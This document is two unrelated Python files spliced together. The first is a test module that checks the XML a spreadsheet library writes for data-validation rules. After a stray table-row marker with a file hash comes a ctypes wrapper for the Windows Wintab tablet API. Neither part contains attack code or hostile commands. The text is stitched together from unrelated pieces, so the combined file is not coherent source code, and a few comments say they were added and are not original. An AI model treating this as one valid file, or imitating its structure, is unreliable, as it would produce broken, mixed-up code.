self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_4(self):
"""
Test 3,4,5 Integer == 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '=',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_5(self):
"""
Test 3,4,5 Integer == 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '==',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_6(self):
"""
Test 6,7,8 Integer != 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'not equal to',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="notEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_7(self):
"""
Test 6,7,8 Integer != 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '<>',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="notEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_8(self):
"""
Test 6,7,8 Integer != 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '!=',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="notEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_9(self):
"""
Test 9,10 Integer > 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'greater than',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="greaterThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_10(self):
"""
Test 9,10 Integer > 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '>',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="greaterThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_11(self):
"""
Test 11,12 Integer < 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'less than',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="lessThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_12(self):
"""
Test 11,12 Integer < 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '<',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="lessThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_13(self):
"""
Test 13,14 Integer >= 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'greater than or equal to',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="greaterThanOrEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_14(self):
"""
Test 13,14 Integer >= 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '>=',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="greaterThanOrEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_15(self):
"""
Test 15,16 Integer <= 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'less than or equal to',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="lessThanOrEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_16(self):
"""
Test 15,16 Integer <= 1.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '<=',
'value': 1,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" operator="lessThanOrEqual" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_17(self):
"""
Test 17 Integer between 1 and 10 (same as test 1) + Ignore blank off.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'ignore_blank': 0,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_18(self):
"""
Test 18 Integer between 1 and 10 (same as test 1) + Error style == warning.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'error_type': 'warning',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" errorStyle="warning" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_19(self):
"""
Test 19 Integer between 1 and 10 (same as test 1) + Error style == info.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'error_type': 'information',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" errorStyle="information" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_20(self):
"""
Test 20 Integer between 1 and 10 (same as test 1)
+ input title.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Input title January" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_21(self):
"""
Test 21 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_22(self):
"""
Test 22 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
+ error title.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
'error_title': 'Error title March',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" errorTitle="Error title March" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_23(self):
"""
Test 23 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
+ error title.
+ error message.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
'error_title': 'Error title March',
'error_message': 'Error message April',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" errorTitle="Error title March" error="Error message April" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_24(self):
"""
Test 24 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
+ error title.
+ error message.
- input message box.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
'error_title': 'Error title March',
'error_message': 'Error message April',
'show_input': 0,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showErrorMessage="1" errorTitle="Error title March" error="Error message April" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_25(self):
"""
Test 25 Integer between 1 and 10 (same as test 1)
+ input title.
+ input message.
+ error title.
+ error message.
- input message box.
- error message box.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'input_title': 'Input title January',
'input_message': 'Input message February',
'error_title': 'Error title March',
'error_message': 'Error message April',
'show_input': 0,
'show_error': 0,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" errorTitle="Error title March" error="Error message April" promptTitle="Input title January" prompt="Input message February" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_26(self):
"""
Test 26 'Any' shouldn't produce a DV record if there are no messages.
"""
self.worksheet.data_validation('B5', {'validate': 'any'})
self.worksheet._write_data_validations()
exp = ''
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_data_validations_27(self):
"""
Test 27 Decimal = 1.2345
"""
self.worksheet.data_validation('B5', {'validate': 'decimal',
'criteria': '==',
'value': 1.2345,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="decimal" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1.2345</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_28(self):
"""
Test 28 List = a,bb,ccc
"""
self.worksheet.data_validation('B5', {'validate': 'list',
'source': ['a', 'bb', 'ccc'],
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>"a,bb,ccc"</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_29(self):
"""
Test 29 List = a,bb,ccc, No dropdown
"""
self.worksheet.data_validation('B5', {'validate': 'list',
'source': ['a', 'bb', 'ccc'],
'dropdown': 0,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="list" allowBlank="1" showDropDown="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>"a,bb,ccc"</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_30(self):
"""
Test 30 List = $D$1:$D$5
"""
self.worksheet.data_validation('A1:A1', {'validate': 'list',
'source': '=$D$1:$D$5',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="A1"><formula1>$D$1:$D$5</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_31(self):
"""
Test 31 Date = 39653 (2008-07-24)
"""
self.worksheet.data_validation('B5', {'validate': 'date',
'criteria': '==',
'value': date(2008, 7, 24),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="date" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>39653</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_32(self):
"""
Test 32 Date = 2008-07-25T
"""
self.worksheet.data_validation('B5', {'validate': 'date',
'criteria': '==',
'value': date(2008, 7, 25),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="date" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>39654</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_33(self):
"""
Test 33 Date between ranges.
"""
self.worksheet.data_validation('B5', {'validate': 'date',
'criteria': 'between',
'minimum': date(2008, 1, 1),
'maximum': date(2008, 12, 12),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="date" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>39448</formula1><formula2>39794</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_34(self):
"""
Test 34 Time = 0.5 (12:00:00)
"""
self.worksheet.data_validation('B5:B5', {'validate': 'time',
'criteria': '==',
'value': time(12),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="time" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>0.5</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_35(self):
"""
Test 35 Time = T12:00:00
"""
self.worksheet.data_validation('B5', {'validate': 'time',
'criteria': '==',
'value': time(12, 0, 0),
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="time" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>0.5</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_36(self):
"""
Test 36 Custom == 10.
"""
self.worksheet.data_validation('B5', {'validate': 'custom',
'criteria': '==',
'value': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="custom" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>10</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_37(self):
"""
Test 37 Check the row/col processing: single A1 style cell.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_38(self):
"""
Test 38 Check the row/col processing: single A1 style range.
"""
self.worksheet.data_validation('B5:B10', {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5:B10"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_39(self):
"""
Test 39 Check the row/col processing: single (row, col) style cell.
"""
self.worksheet.data_validation(4, 1, 4, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_40(self):
"""
Test 40 Check the row/col processing: single (row, col) style range.
"""
self.worksheet.data_validation(4, 1, 9, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5:B10"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_41(self):
"""
Test 41 Check the row/col processing: multiple (row, col) style cells.
"""
self.worksheet.data_validation(4, 1, 4, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'other_cells': [[4, 3, 4, 3]],
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5 D5"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_42(self):
"""
Test 42 Check the row/col processing: multiple (row, col) style cells.
"""
self.worksheet.data_validation(4, 1, 4, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'other_cells': [[6, 1, 6, 1], [8, 1, 8, 1]],
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5 B7 B9"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_43(self):
"""
Test 43 Check the row/col processing: multiple (row, col) style cells.
"""
self.worksheet.data_validation(4, 1, 8, 1, {'validate': 'integer',
'criteria': 'between',
'minimum': 1,
'maximum': 10,
'other_cells': [[3, 3, 3, 3]],
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="whole" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5:B9 D4"><formula1>1</formula1><formula2>10</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_44(self):
"""
Test 44 Multiple validations.
"""
self.worksheet.data_validation('B5', {'validate': 'integer',
'criteria': '>',
'value': 10,
})
self.worksheet.data_validation('C10', {'validate': 'integer',
'criteria': '<',
'value': 10,
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="2"><dataValidation type="whole" operator="greaterThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>10</formula1></dataValidation><dataValidation type="whole" operator="lessThan" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="C10"><formula1>10</formula1></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_45(self):
"""
Test 45 Test 'any' with input messages.
"""
self.worksheet.data_validation('B5', {'validate': 'any',
'input_title': 'Input title January',
'input_message': 'Input message February',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Input title January" prompt="Input message February" sqref="B5"/></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
def test_write_data_validations_46(self):
"""
Test 46 Date between ranges with formulas.
"""
self.worksheet.data_validation('B5', {'validate': 'date',
'criteria': 'between',
'minimum': date(2018, 1, 1),
'maximum': '=TODAY()',
})
self.worksheet._write_data_validations()
exp = '<dataValidations count="1"><dataValidation type="date" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5"><formula1>43101</formula1><formula2>TODAY()</formula2></dataValidation></dataValidations>'
got = self.fh.getvalue()
exp = _xml_to_list(exp)
got = _xml_to_list(got)
self.assertEqual(got, exp)
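    # Reading aid (added summary, not part of the original fixtures): the
    # data_validation() options exercised above map onto attributes of the
    # generated <dataValidation> element roughly as follows.
    #   'error_type'        -> errorStyle ("warning" / "information")
    #   'ignore_blank': 0   -> drops allowBlank="1"
    #   'show_input': 0     -> drops showInputMessage="1"
    #   'show_error': 0     -> drops showErrorMessage="1"
    #   'input_title' / 'input_message' -> promptTitle / prompt
    #   'error_title' / 'error_message' -> errorTitle / error
    #   'dropdown': 0       -> adds showDropDown="1" (note the inverted sense)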
|
py | 1a3452308d0432333fb50b6ccbd5ff3430b290cb | #!/usr/bin/python
# $Id:$
import ctypes
import pyglet
lib = ctypes.windll.wintab32
LONG = ctypes.c_long
BOOL = ctypes.c_int
UINT = ctypes.c_uint
WORD = ctypes.c_uint16
DWORD = ctypes.c_uint32
WCHAR = ctypes.c_wchar
FIX32 = DWORD
WTPKT = DWORD
LCNAMELEN = 40
class AXIS(ctypes.Structure):
_fields_ = (
('axMin', LONG),
('axMax', LONG),
('axUnits', UINT),
('axResolution', FIX32)
)
def get_scale(self):
return 1 / float(self.axMax - self.axMin)
def get_bias(self):
return -self.axMin
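# Minimal sketch (not part of the original module) of how get_scale()/get_bias()
# are meant to be combined: a raw axis reading is shifted by the bias and scaled
# into [0, 1], i.e. (raw - axMin) / (axMax - axMin). DeviceInstance applies the
# same arithmetic to normal pressure below.
def _normalize_axis_value(axis, raw_value):
    return (raw_value + axis.get_bias()) * axis.get_scale()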
class ORIENTATION(ctypes.Structure):
_fields_ = (
('orAzimuth', ctypes.c_int),
('orAltitude', ctypes.c_int),
('orTwist', ctypes.c_int)
)
class ROTATION(ctypes.Structure):
_fields_ = (
('roPitch', ctypes.c_int),
('roRoll', ctypes.c_int),
('roYaw', ctypes.c_int),
)
class LOGCONTEXT(ctypes.Structure):
_fields_ = (
('lcName', WCHAR * LCNAMELEN),
('lcOptions', UINT),
('lcStatus', UINT),
('lcLocks', UINT),
('lcMsgBase', UINT),
('lcDevice', UINT),
('lcPktRate', UINT),
('lcPktData', WTPKT),
('lcPktMode', WTPKT),
('lcMoveMask', WTPKT),
('lcBtnDnMask', DWORD),
('lcBtnUpMask', DWORD),
('lcInOrgX', LONG),
('lcInOrgY', LONG),
('lcInOrgZ', LONG),
('lcInExtX', LONG),
('lcInExtY', LONG),
('lcInExtZ', LONG),
('lcOutOrgX', LONG),
('lcOutOrgY', LONG),
('lcOutOrgZ', LONG),
('lcOutExtX', LONG),
('lcOutExtY', LONG),
('lcOutExtZ', LONG),
('lcSensX', FIX32),
('lcSensY', FIX32),
('lcSensZ', FIX32),
('lcSysMode', BOOL),
('lcSysOrgX', ctypes.c_int),
('lcSysOrgY', ctypes.c_int),
('lcSysExtX', ctypes.c_int),
('lcSysExtY', ctypes.c_int),
('lcSysSensX', FIX32),
('lcSysSensY', FIX32),
)
# Custom packet format with fields
# PK_CHANGED
# PK_CURSOR
# PK_BUTTONS
# PK_X
# PK_Y
# PK_Z
# PK_NORMAL_PRESSURE
# PK_TANGENT_PRESSURE
# PK_ORIENTATION (check for tilt extension instead)?
class PACKET(ctypes.Structure):
_fields_ = (
('pkChanged', WTPKT),
('pkCursor', UINT),
('pkButtons', DWORD),
('pkX', LONG),
('pkY', LONG),
('pkZ', LONG),
('pkNormalPressure', UINT),
('pkTangentPressure', UINT),
('pkOrientation', ORIENTATION),
)
PK_CONTEXT = 0x0001 # reporting context
PK_STATUS = 0x0002 # status bits
PK_TIME = 0x0004 # time stamp
PK_CHANGED = 0x0008 # change bit vector
PK_SERIAL_NUMBER = 0x0010 # packet serial number
PK_CURSOR = 0x0020 # reporting cursor
PK_BUTTONS = 0x0040 # button information
PK_X = 0x0080 # x axis
PK_Y = 0x0100 # y axis
PK_Z = 0x0200 # z axis
PK_NORMAL_PRESSURE = 0x0400 # normal or tip pressure
PK_TANGENT_PRESSURE = 0x0800 # tangential or barrel pressure
PK_ORIENTATION = 0x1000 # orientation info: tilts
PK_ROTATION = 0x2000 # rotation info; 1.1
TU_NONE = 0
TU_INCHES = 1
TU_CENTIMETERS = 2
TU_CIRCLE = 3
# messages
WT_DEFBASE = 0x7ff0
WT_MAXOFFSET = 0xf
WT_PACKET = 0 # remember to add base
WT_CTXOPEN = 1
WT_CTXCLOSE = 2
WT_CTXUPDATE = 3
WT_CTXOVERLAP = 4
WT_PROXIMITY = 5
WT_INFOCHANGE = 6
WT_CSRCHANGE = 7
# system button assignment values
SBN_NONE = 0x00
SBN_LCLICK = 0x01
SBN_LDBLCLICK = 0x02
SBN_LDRAG = 0x03
SBN_RCLICK = 0x04
SBN_RDBLCLICK = 0x05
SBN_RDRAG = 0x06
SBN_MCLICK = 0x07
SBN_MDBLCLICK = 0x08
SBN_MDRAG = 0x09
# for Pen Windows
SBN_PTCLICK = 0x10
SBN_PTDBLCLICK = 0x20
SBN_PTDRAG = 0x30
SBN_PNCLICK = 0x40
SBN_PNDBLCLICK = 0x50
SBN_PNDRAG = 0x60
SBN_P1CLICK = 0x70
SBN_P1DBLCLICK = 0x80
SBN_P1DRAG = 0x90
SBN_P2CLICK = 0xA0
SBN_P2DBLCLICK = 0xB0
SBN_P2DRAG = 0xC0
SBN_P3CLICK = 0xD0
SBN_P3DBLCLICK = 0xE0
SBN_P3DRAG = 0xF0
HWC_INTEGRATED = 0x0001
HWC_TOUCH = 0x0002
HWC_HARDPROX = 0x0004
HWC_PHYSID_CURSORS = 0x0008 # 1.1
CRC_MULTIMODE = 0x0001 # 1.1
CRC_AGGREGATE = 0x0002 # 1.1
CRC_INVERT = 0x0004 # 1.1
WTI_INTERFACE = 1
IFC_WINTABID = 1
IFC_SPECVERSION = 2
IFC_IMPLVERSION = 3
IFC_NDEVICES = 4
IFC_NCURSORS = 5
IFC_NCONTEXTS = 6
IFC_CTXOPTIONS = 7
IFC_CTXSAVESIZE = 8
IFC_NEXTENSIONS = 9
IFC_NMANAGERS = 10
IFC_MAX = 10
WTI_STATUS = 2
STA_CONTEXTS = 1
STA_SYSCTXS = 2
STA_PKTRATE = 3
STA_PKTDATA = 4
STA_MANAGERS = 5
STA_SYSTEM = 6
STA_BUTTONUSE = 7
STA_SYSBTNUSE = 8
STA_MAX = 8
WTI_DEFCONTEXT = 3
